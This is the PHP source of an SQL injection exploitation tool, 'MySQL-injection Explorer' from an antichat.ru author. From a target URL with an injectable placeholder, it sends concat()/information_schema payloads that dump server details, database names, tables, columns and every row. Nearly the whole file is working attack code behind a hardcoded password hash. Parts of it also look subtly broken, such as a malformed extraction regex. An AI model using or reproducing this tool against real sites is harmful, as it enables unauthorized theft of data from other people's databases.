Code:
<?php
//MySQL-injection Explorer v 0.1 beta
//Coded by Scorpius [http://antichat.ru]
session_start();
$my_auth_pass="63a9f0ea7bb98050796b649e85481845"; // root
$pause=0; //Pause in seconds between requests
if(!empty($_POST['clear'])) {
unset($_SESSION['url']);
#unset($_SESSION['auth_pass']);
unset($_POST['url']);
}
if(!empty($_SESSION['url']) && !empty($_SESSION['host'])) {
$url=$_SESSION['url'];
}
?>
<html>
<head>
<title>MySQL-injection Explorer</title>
<style>
table {border: 1px solid gray; width:800px;}
body {background-color:#2B2F34; color: #C1C1C7;}
input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}
a:link{color: #B9B9BD; text-decoration: none; font-size: 10pt;}
a:visited{color: #B9B9BD; text-decoration: none; font-size: 10pt;}
a:hover, a:active{width: 100%; background-color: #A8A8AD; color: #E7E7EB; text-decoration: none; font-size: 10pt;}
td, th{font: 10pt verdana, geneva, lucida, arial, helvetica, sans-serif; border-color:black; background-color:#363940;}
</style>
</head>
<body>
<?php
Auth(); //authorization
?>
<table>
<tr><td align="center">MySQL-injection Explorer v 0.1 beta</td></tr>
</table><br>
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
<table>
<tr>
<td>URL: <input type="text" name="url" size="100" value="<?=$url?>"></td>
</tr>
<!-- <tr><td>END: <input type="text" name="end_url" value="+--+" size="2"></td></tr> -->
<tr>
<td>
<input type="submit" name="act" value="Get MySQL Info">
<input type="submit" name="act" value="Get DB Names">
<input type="submit" name="act" value="Get Tables Names">
<input type="submit" name="clear" value="Clear">
</td>
</tr>
</table><br>
<table>
<tr><td><a href="<?=$_SERVER['PHP_SELF']?>">[Home]</a></td></tr>
</table>
</form>
<?php
@set_time_limit(0);
@error_reporting(0);
if(!empty($_POST['url'])) {
$_SESSION['url']=$_POST['url'];
$host=parse_url($_POST['url']);
$_SESSION['host']=$host['host'];
}
if(!empty($_SESSION['url']) && !empty($_SESSION['host'])) {
$url=$_SESSION['url'];
$host=$_SESSION['host'];
}
else die();
//Derivation of basic information about MySQL
if($_POST['act']=='Get MySQL Info')
{
echo '<table>';
$info=GetInfo($host,$url);
for($i=0;$i<count($info);$i++)
{
$n=$i+1;
echo '<tr><td><b>'.$n.'</b></td><td>'.$info[$i].'</td></tr>';
}
echo '</table>';
}
//Derivation of names of databases
if($_POST['act']=='Get DB Names')
{
echo '<table>';
$db_names=GetDBNames($host,$url);
for($i=1;$i<=count($db_names);$i++)
{
echo '<tr><td><b>'.$i.'</b></td><td><a href="?db='.$db_names[$i-1].'">'.$db_names[$i-1].'</a></td><tr>';
}
echo '</table>';
}
//Displays all the tables from the database
if($_POST['act']=='Get Tables Names' || !empty($_GET['db']) && empty($_GET['act']))
{
echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post">';
echo '<table>';
echo '<tr><th>?</th><th>Table Name</th><th>DB Name</th></tr>';
if(empty($_GET['db']))
{
$count_tables=GetCountAllTables($host,$url);
for($i=0;$i<$count_tables;$i++)
{
$n=$i+1;
$tables[]=GetTableName($host,$url,'all',$i);
$data=explode(':::',$tables[$i]);
$table=$data[0];$db=$data[1];
flush();
echo '<tr><td><b>'.$n.'</b></td><td><a href="?act=GetTable&table='.$table.'&db='.$db.'">'.$table.'</a></td><td><a href="?db='.$db.'">'.$db.'</a></td></tr>';
}
}
else
{
$count_tables=GetCountTables($host,$url,$_GET['db']);
for($i=0;$i<$count_tables;$i++)
{
$n=$i+1;
$tables[]=GetTableName($host,$url,$_GET['db'],$i);
$data=explode(':::',$tables[$i]);
$table=$data[0];$db=$data[1];
flush();
echo '<tr><td><b>'.$n.'</b></td><td><a href="?act=GetTable&table='.$table.'&db='.$db.'">'.$table.'</a></td><td><a href="?db='.$db.'">'.$db.'</a></td></tr>';
}
}
echo '</table>';
echo '</form';
}
//Output data from the table
if($_GET['act']=='GetTable')
{
echo '<table>';
$rows=GetCountRows($host,$url,$_GET['db'],$_GET['table']);
$columns=GetColumnNames($host,$url,$_GET['table']);
echo '<tr>';
for($i=0;$i<count($columns);$i++)
echo '<td><b>'.$columns[$i].'</b></td>';
echo '</tr>';
for($i=0;$i<$rows;$i++)
{
$row=GetRow($host,$url,$_GET['db'],$_GET['table'],$i);
$data=explode(":::",$row);
echo '<tr>';
for($n=0;$n<count($data);$n++)
{
flush();
echo '<td>'.$data[$n].'</td>';
}
echo '</tr>';
}
echo '</table>';
}
echo '<br><table><tr><td>Requests: '.$request.'</td><td align="right">© Scorpius </td></tr></table>';
?>
</body>
<html>
<?php
@set_time_limit(0);
@error_reporting(0);
#GetInfo($host,$url); // (hostname, target url)
#GetCurrentDB($host,$url); // (hostname, target url)
#GetDBNames($host,$url); // (hostname, target url)
#GetTableName($host,$url,$db_name,$id_table); // (hostname, target url, [db name])
#GetCountTables($host,$url,$table_name); // (hostname, target url, [db_name])
#GetRow($host,$url,$db_name,$table_name,$id_row); //
function Auth()
{
global $my_auth_pass;
if(isset($_REQUEST['auth_submit']))
{
$_SESSION['auth_pass']=md5($_REQUEST['auth_pass']);
}
if($_SESSION['auth_pass'] == $my_auth_pass)
{
return 1;
}
else
{
echo '<center><form method="post"><table style="width:100px;">';
echo '<tr><td>Password:</td><td><input type="password" name="auth_pass"></td>';
echo '<td align="center" colspan="2"><input type="submit" name="auth_submit" value="Login"</td></tr>';
echo '</table></form></center>';
exit;
}
}
//Function of obtaining information about MySQL server (1 request)
function GetInfo($host,$url)
{
//We obtain data on the MySQL server
$new_url=str_replace('{}','concat(0x3a3a3a,concat_ws(0x3a3a3a,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),0x3a3a3a)',$url);
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$info);
$data=explode(':::',$info[1]);
$info=array();
foreach($data as $v)
$info[]=$v;
return $info;
}
//Function get the name of the current database (1 request)
function GetCurrentDB($host,$url)
{
$new_url=str_replace('{}','concat(0x3a3a3a,database(),0x3a3a3a)',$url);
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$database);
return $database[1];
}
//Function names for databases (5 queries)
function GetDBNames($host,$url)
{
//First get the number of databases
$new_url=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url.='+FROM+information_schema.schemata+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_db);
$count_db=$count_db[1];
//Then we obtain the names of databases
$url=str_replace('{}','concat(0x3a3a3a,schema_name,0x3a3a3a)',$url);
for($i=0;$i<$count_db;$i++)
{
$new_url=$url.'+FROM+information_schema.schemata+LIMIT+'.$i.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$dbname);
$db_names[]=$dbname[1];
}
return $db_names;
}
//The function get the name of one table and the name of its database (1 request)
function GetTableName($host,$url,$db_name='all',$id_table=0)
{
if($db_name=='all')
{
//Get the name of one table and the name of its database
$url=str_replace('{}','concat(0x3a3a3a,table_name,0x3a3a3a,table_schema,0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+LIMIT+'.$id_table.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$table_name);
return $table_name[1];
}
else
{
//Get the name of one table from a specific database and the name of its database
$url=str_replace('{}','concat(0x3a3a3a,table_name,0x3a3a3a,table_schema,0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+WHERE+table_schema=0x'.bin2hex($db_name).'+LIMIT+'.$id_table.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$table_name);
return $table_name[1];
}
}
//Function for a single record
function GetRow($host,$url,$db_name,$table_name,$id_row=1)
{
$columns=GetColumnNames($host,$url,$table_name);
//Generating a request for poluchnie entire records from a table
$str='concat(0x3a3a3a';
for($i=0;$i<count($columns);$i++)
{
$str.=','.$columns[$i].',0x3a3a3a';
}
$str.=')';
$url4=str_replace('{}',$str,$url);
$new_url=$url4.'+FROM+'.$db_name.'.'.$table_name.'+LIMIT+'.$id_row.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$row);
$row=$row[1];
return($row);
}
//The function table number obtained
function GetCountTables($host,$url,$db_name='all')
{
$url1=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url1.'+FROM+information_schema.tables+WHERE+table_schema=0x'.bin2hex($db_name).'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_tables);
$count_tables=$count_tables[1];
return $count_tables;
}
//Function for the number of entries in the table
function GetCountRows($host,$url,$db_name,$table_name)
{
//Get the kolichstvo records in the table
$url=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url.'+FROM+'.$db_name.'.'.$table_name.'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_rows);
$count_rows=$count_rows[1];
return $count_rows;
}
//The function list all the tables
function GetAllTableNames($host,$url)
{
//First get the number of tables
$url1=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url1.'+FROM+information_schema.tables+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_tables);
$count_tables=$count_tables[1];
//Then we obtain the names of all tables
$url2=str_replace('{}','concat(0x3a3a3a,table_name,0x3a3a3a)',$url);
for($i=0;$i<$count_tables;$i++)
{
$new_url=$url2.'+FROM+information_schema.tables+LIMIT+'.$i.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$table_name);
$table_names[]=$table_name[1];
}
return $table_names;
}
//Function to obtain the number of all tables
function GetCountAllTables($host,$url)
{
$url=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_tables);
$count_tables=$count_tables[1];
return $count_tables;
}
//Function for the database name to table name
function GetDBNameFromTable($host,$url,$table_name)
{
$url=str_replace('{}','concat(0x3a3a3a,table_schema,0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+WHERE+table_name=0x'.bin2hex($table_name).'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$db_name);
return $db_name[1];
}
function GetColumnNames($host,$url,$table_name)
{
//First get the number of fields in a table
$url2=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url2.'+FROM+information_schema.columns+WHERE+table_name=0x'.bin2hex($table_name).'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_columns);
$count_columns=$count_columns[1];
//Then we obtain the field names
$url3=str_replace('{}','concat(0x3a3a3a,column_name,0x3a3a3a)',$url);
for($i=0;$i<$count_columns;$i++)
{
$new_url=$url3.'+FROM+information_schema.columns+WHERE+table_name=0x'.bin2hex($table_name).'+LIMIT+'.$i.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$column);
$columns[]=$column[1];
}
return $columns;
}
//Function to query the server
function get($host,$url)
{
global $request;
$fsock=fsockopen($host,80,$errno,$errstr);
$headers="POST $url HTTP/1.1\r\n";
$headers.="Host: $host\r\n";
$headers.="Connection: close\r\n\r\n";
sleep($pause);
fwrite($fsock,$headers); $request++;
while(!feof($fsock))
{
$response.=fread($fsock,1024);
}
#echo '<pre>'.$headers.'</pre>';
#echo '<pre>'.$response.'</pre>';
return $response;
}
?> |
